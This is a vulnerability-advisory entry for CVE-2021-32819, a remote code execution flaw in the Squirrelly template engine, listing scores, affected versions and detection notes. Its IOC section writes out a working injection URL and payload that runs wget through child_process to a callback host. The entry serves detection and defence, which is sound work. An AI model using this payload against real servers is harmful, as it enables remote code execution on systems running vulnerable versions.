CVE-2021-32819
Published: 2021-05-14


Priority: P187 (high)
CVSS 3.1: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
Exploitation: exploited in the wild (ITW); listed in VulnCheck KEV; used for initial access
EPSS: 59.84% (99.0th percentile)
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. This issue is fixed in version 9.0.0. For complete details refer to the referenced GHSL-2021-023.

Affected (3 ranges)

Vendor        Product     Version range      Fixed in
squirrelly    squirrelly  (not specified)    (not specified)
squirrelly    squirrelly  >= 0 < 9.0.0       9.0.0
squirrellyjs  squirrelly  >= 9.0.0 < 9.0.0   9.0.0

Detection & IOCs (extracted from sources)

URL: /?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//
Command: var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http://{{interactsh-url}}');
  • Exploit arrives as a GET request with query parameters 'Express', 'autoEscape', and 'defaultFilter'; the 'defaultFilter' parameter carries a JavaScript injection payload that breaks out of the template context and invokes child_process.exec via global.process.mainModule.constructor._load.
  • Successful exploitation can be confirmed via an out-of-band HTTP callback (OAST); look for an inbound HTTP request carrying 'User-Agent: Wget' originating from the target server.
  • The attack overwrites internal Squirrelly configuration options (autoEscape, defaultFilter) through the Express render API query string, enabling template sandbox escape and RCE.
  • The vulnerability affects Squirrelly versions up to and including 8.0.8; version 9.0.0 contains the fix. Detections should be scoped to deployments running affected versions.
  • Exploitation requires the target application to expose user-controlled data to the Express render API query string (e.g., passing req.query directly as template locals), which is an application-level configuration issue.

CVSS provenance

Source     Version   Score   Severity   Vector
nvd        v3.1      8.8     HIGH       CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvd        v2.0      6.8     MEDIUM     AV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck  -         8.0     HIGH       -